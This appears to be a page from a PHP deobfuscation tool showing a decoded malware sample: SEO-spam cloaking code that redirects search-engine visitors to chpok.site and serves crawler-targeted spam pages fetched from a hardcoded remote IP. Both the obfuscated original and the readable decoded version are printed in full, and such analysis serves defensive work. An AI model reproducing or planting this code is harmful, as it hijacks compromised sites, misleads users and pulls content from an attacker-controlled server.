Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto LFSdC; ZEo1P: if ( strpos( $_SERVER["\x48\x54\124\x50\x5f\122\..

Decoded Output download

<?php 
goto LFSdC; 
ZEo1P: 
if ( 
    strpos( 
        $_SERVER["HTTP_REFERER"], 
        "google." 
    ) or 
    strpos( 
        $_SERVER["HTTP_REFERER"], 
        "yahoo." 
    ) or 
    strpos( 
        $_SERVER["HTTP_REFERER"], 
        "bing." 
    ) 
) { 
    header( 
        "Location: https://chpok.site/enter/?mark={$today}-{$s}&engkey={$keyword}" 
    ); 
    die(); 
} else { 
    $myname = $_GET["id"] . ".php"; 
    if (file_exists("index/" . $myname)) { 
        $html = @file_get_contents("index/" . $myname); 
        if ( 
            strpos( 
                $_SERVER[ 
                    "HTTP_USER_AGENT" 
                ], 
                "bing" 
            ) > 
                2 or 
            strpos( 
                $_SERVER[ 
                    "HTTP_USER_AGENT" 
                ], 
                "yahoo" 
            ) > 
                2 
        ) { 
            $keyword = str_replace("-", " ", $_GET["id"]); 
            $html = str_replace( 
                "<title></title>", 
                "<title>{$keyword}</title>", 
                $html 
            ); 
        } 
        echo $html; 
        die(); 
    } 
} 
goto V_aKG; 
QJZeV: 
if (($s == "\") | ($s == "/")) { 
    $s = ""; 
} 
goto KOIk2; 
vy5uL: 
if ($_GET["id"] == "testing") { 
    echo "test good..."; 
    die(); 
} 
goto krSyu; 
BpP3C: 
$xx1 = 5; 
goto zMbLH; 
lPr5r: 
$apass1 = "visdoijew"; 
goto VkMtz; 
tcpjB: 
$apass3 = "rv32ydacsvsdv"; 
goto bdM4c; 
GKjxS: 
if ( 
    strpos( 
        $_SERVER[ 
            "HTTP_USER_AGENT" 
        ], 
        "bing" 
    ) > 
        2 or 
    strpos( 
        $_SERVER[ 
            "HTTP_USER_AGENT" 
        ], 
        "yahoo" 
    ) > 
        2 
) { 
    $text = str_replace( 
        "<title></title>", 
        "<title>{$keyword}</title>", 
        $text 
    ); 
} 
goto AQmS_; 
LUvBM: 
if (strlen($text) < 5000) { 
    $url = "135.181.21.126"; 
    $fp = fsockopen($url, 80, $errno, $errstr, 30); 
    if (!$fp) { 
        echo "{$errstr} ({$errno})<br />\xa"; 
    } else { 
        $req = 
            "/" . 
            $_GET["fn"] . 
            ".php?pass={$apass}&q={$_GET["id"]}"; 
        $out = "GET {$req} HTTP/1.0\xd\xa"; 
        $out .= "Host: {$url}
\xa"; 
        $out .= 
            "Connection: Close
\xd\xa"; 
        fwrite($fp, $out); 
        while (!feof($fp)) { 
            $text = $text . fgets($fp, 2048); 
        } 
        fclose($fp); 
    } 
    fclose($out); 
    $text = explode("
", $text); 
    $text = $text[7]; 
} 
goto GhrST; 
ho7PJ: 
$text = ""; 
goto RPC3t; 
LFSdC: 
error_reporting(0); 
goto V5o7v; 
buFfR: 
$keyword = str_replace(" ", "+", $keyword); 
goto Jrj2m; 
krSyu: 
if ($_GET["id"] == "index") { 
    header( 
        "Location: https://google.com" 
    ); 
    die(); 
} 
goto ETX4l; 
bdM4c: 
$apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; 
goto ZEo1P; 
V5o7v: 
$today = "20231227-"; 
goto A9HzL; 
A9HzL: 
foreach ($_GET as $a => $b) { 
    $_GET["id"] = $b; 
} 
goto vy5uL; 
AQmS_: 
echo $text; 
goto Uf7uS; 
l7rkL: 
$_GET["fn"] = "696969new"; 
goto lPr5r; 
VkMtz: 
$x1 = 3; 
goto BpP3C; 
D3y1o: 
$s = dirname($_SERVER["PHP_SELF"]); 
goto QJZeV; 
Jrj2m: 
$apass2 = "b23hr23vr32"; 
goto D3y1o; 
V_aKG: 
$query_pars_2 = str_replace("-", "+", $_GET["id"]); 
goto ho7PJ; 
ETX4l: 
$_GET["world"] = 5; 
goto l7rkL; 
GhrST: 
if (strlen($text) > 5000) { 
    $out = fopen("index/" . $myname, "w"); 
    fwrite($out, $text); 
    fclose($out); 
} 
goto GKjxS; 
rQTN0: 
if (strlen($text) < 5000) { 
    $text = file_get_contents( 
        "http://135.181.21.126/" . 
            $_GET["fn"] . 
            ".php?pass={$apass}&q={$_GET["id"]}" 
    ); 
} 
goto LUvBM; 
KOIk2: 
$s = $_SERVER["SERVER_NAME"] . $s; 
goto tcpjB; 
zMbLH: 
$keyword = str_replace("-", " ", $_GET["id"]); 
goto buFfR; 
RPC3t: 
if (function_exists("curl_init")) { 
    $ch = curl_init(); 
    curl_setopt( 
        $ch, 
        CURLOPT_URL, 
        "http://135.181.21.126/" . 
            $_GET["fn"] . 
            ".php?pass={$apass}&q={$_GET["id"]}" 
    ); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); 
    curl_setopt( 
        $ch, 
        CURLOPT_USERAGENT, 
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 
    ); 
    $text = curl_exec($ch); 
    curl_close($ch); 
} 
goto rQTN0; 
Uf7uS: ?> 

Did this file decode correctly?

Original Code

<?php
goto LFSdC;
ZEo1P:
if (
    strpos(
        $_SERVER["\x48\x54\124\x50\x5f\122\x45\106\x45\x52\105\122"],
        "\147\157\157\147\x6c\145\x2e"
    ) or
    strpos(
        $_SERVER["\110\x54\x54\x50\137\x52\x45\x46\x45\x52\105\x52"],
        "\171\x61\x68\x6f\x6f\56"
    ) or
    strpos(
        $_SERVER["\110\124\124\120\x5f\122\105\x46\105\x52\105\122"],
        "\142\x69\x6e\x67\56"
    )
) {
    header(
        "\114\157\x63\x61\x74\x69\157\x6e\72\x20\x68\x74\x74\160\x73\x3a\x2f\57\x63\150\x70\x6f\153\x2e\163\x69\164\145\x2f\145\156\x74\x65\162\x2f\77\x6d\141\x72\153\x3d{$today}\x2d{$s}\46\x65\156\x67\x6b\145\171\75{$keyword}"
    );
    die();
} else {
    $myname = $_GET["\x69\x64"] . "\56\160\150\160";
    if (file_exists("\151\156\144\x65\170\57" . $myname)) {
        $html = @file_get_contents("\x69\x6e\144\145\170\x2f" . $myname);
        if (
            strpos(
                $_SERVER[
                    "\x48\x54\x54\120\x5f\x55\x53\105\122\137\101\107\105\x4e\x54"
                ],
                "\x62\151\x6e\x67"
            ) >
                2 or
            strpos(
                $_SERVER[
                    "\110\124\124\120\x5f\125\x53\x45\122\x5f\x41\107\x45\x4e\x54"
                ],
                "\171\x61\150\157\157"
            ) >
                2
        ) {
            $keyword = str_replace("\x2d", "\40", $_GET["\x69\144"]);
            $html = str_replace(
                "\x3c\x74\151\x74\154\x65\76\x3c\57\164\x69\164\154\x65\x3e",
                "\x3c\164\151\x74\154\145\76{$keyword}\74\x2f\x74\x69\x74\x6c\x65\x3e",
                $html
            );
        }
        echo $html;
        die();
    }
}
goto V_aKG;
QJZeV:
if (($s == "\134") | ($s == "\57")) {
    $s = "";
}
goto KOIk2;
vy5uL:
if ($_GET["\151\x64"] == "\x74\145\x73\x74\151\x6e\147") {
    echo "\x74\x65\x73\164\x20\147\x6f\157\144\56\x2e\x2e";
    die();
}
goto krSyu;
BpP3C:
$xx1 = 5;
goto zMbLH;
lPr5r:
$apass1 = "\x76\151\163\144\x6f\151\x6a\145\x77";
goto VkMtz;
tcpjB:
$apass3 = "\162\x76\63\62\x79\x64\141\x63\x73\x76\163\144\x76";
goto bdM4c;
GKjxS:
if (
    strpos(
        $_SERVER[
            "\x48\124\124\120\x5f\x55\x53\x45\122\137\x41\107\105\x4e\x54"
        ],
        "\x62\x69\156\x67"
    ) >
        2 or
    strpos(
        $_SERVER[
            "\x48\124\x54\120\137\x55\x53\x45\x52\x5f\101\107\105\116\124"
        ],
        "\171\141\x68\157\x6f"
    ) >
        2
) {
    $text = str_replace(
        "\74\x74\x69\x74\154\145\x3e\x3c\57\164\x69\164\x6c\x65\76",
        "\x3c\x74\x69\164\x6c\145\x3e{$keyword}\74\57\x74\x69\164\154\145\x3e",
        $text
    );
}
goto AQmS_;
LUvBM:
if (strlen($text) < 5000) {
    $url = "\61\63\65\x2e\x31\x38\x31\x2e\x32\x31\56\x31\x32\x36";
    $fp = fsockopen($url, 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "{$errstr}\40\x28{$errno}\51\74\x62\x72\x20\x2f\76\xa";
    } else {
        $req =
            "\57" .
            $_GET["\146\156"] .
            "\56\x70\150\x70\77\160\141\x73\163\x3d{$apass}\x26\161\x3d{$_GET["\x69\x64"]}";
        $out = "\x47\105\x54\40{$req}\x20\110\124\x54\120\x2f\61\56\x30\xd\xa";
        $out .= "\110\x6f\163\164\x3a\x20{$url}\15\xa";
        $out .=
            "\x43\157\x6e\156\x65\143\164\x69\x6f\156\x3a\40\103\x6c\157\x73\x65\15\12\xd\xa";
        fwrite($fp, $out);
        while (!feof($fp)) {
            $text = $text . fgets($fp, 2048);
        }
        fclose($fp);
    }
    fclose($out);
    $text = explode("\12", $text);
    $text = $text[7];
}
goto GhrST;
ho7PJ:
$text = "";
goto RPC3t;
LFSdC:
error_reporting(0);
goto V5o7v;
buFfR:
$keyword = str_replace("\x20", "\53", $keyword);
goto Jrj2m;
krSyu:
if ($_GET["\x69\144"] == "\x69\x6e\144\145\x78") {
    header(
        "\x4c\157\x63\x61\x74\151\157\156\72\x20\150\164\x74\x70\x73\x3a\x2f\x2f\x67\157\157\x67\x6c\145\x2e\x63\x6f\155"
    );
    die();
}
goto ETX4l;
bdM4c:
$apass = "{$apass1}" . "{$apass2}" . "{$apass3}";
goto ZEo1P;
V5o7v:
$today = "\x32\x30\x32\63\61\x32\62\x37\55";
goto A9HzL;
A9HzL:
foreach ($_GET as $a => $b) {
    $_GET["\151\x64"] = $b;
}
goto vy5uL;
AQmS_:
echo $text;
goto Uf7uS;
l7rkL:
$_GET["\x66\156"] = "\x36\71\66\71\x36\x39\x6e\x65\167";
goto lPr5r;
VkMtz:
$x1 = 3;
goto BpP3C;
D3y1o:
$s = dirname($_SERVER["\120\x48\x50\137\123\105\x4c\x46"]);
goto QJZeV;
Jrj2m:
$apass2 = "\x62\x32\63\x68\x72\x32\x33\166\162\63\x32";
goto D3y1o;
V_aKG:
$query_pars_2 = str_replace("\55", "\x2b", $_GET["\x69\x64"]);
goto ho7PJ;
ETX4l:
$_GET["\167\157\162\154\x64"] = 5;
goto l7rkL;
GhrST:
if (strlen($text) > 5000) {
    $out = fopen("\151\156\144\145\x78\57" . $myname, "\x77");
    fwrite($out, $text);
    fclose($out);
}
goto GKjxS;
rQTN0:
if (strlen($text) < 5000) {
    $text = file_get_contents(
        "\150\164\164\x70\x3a\57\x2f\61\x33\x35\x2e\61\70\x31\x2e\x32\x31\56\61\62\x36\x2f" .
            $_GET["\x66\x6e"] .
            "\x2e\160\150\x70\x3f\x70\x61\163\x73\75{$apass}\46\161\x3d{$_GET["\x69\x64"]}"
    );
}
goto LUvBM;
KOIk2:
$s = $_SERVER["\123\105\x52\126\x45\122\137\x4e\x41\x4d\105"] . $s;
goto tcpjB;
zMbLH:
$keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]);
goto buFfR;
RPC3t:
if (function_exists("\143\165\x72\154\x5f\151\x6e\151\164")) {
    $ch = curl_init();
    curl_setopt(
        $ch,
        CURLOPT_URL,
        "\150\x74\164\x70\72\x2f\57\x31\63\65\x2e\61\x38\x31\56\62\x31\56\61\x32\x36\57" .
            $_GET["\146\x6e"] .
            "\56\x70\x68\160\77\x70\x61\x73\163\x3d{$apass}\46\161\x3d{$_GET["\x69\x64"]}"
    );
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt(
        $ch,
        CURLOPT_USERAGENT,
        "\115\x6f\172\151\154\x6c\x61\57\x34\56\x30\40\50\x63\x6f\x6d\160\141\164\x69\142\x6c\145\x3b\x20\x4d\x53\111\105\40\66\x2e\x30\x3b\40\127\151\x6e\144\x6f\x77\163\40\x4e\x54\x20\x35\x2e\x31\x3b\40\123\126\x31\51"
    );
    $text = curl_exec($ch);
    curl_close($ch);
}
goto rQTN0;
Uf7uS: ?>

Function Calls

None

Variables

None

Stats

MD5 7bb34ff41c48f5f66c9ffd2d283a4bf1
Eval Count 0
Decode Time 66 ms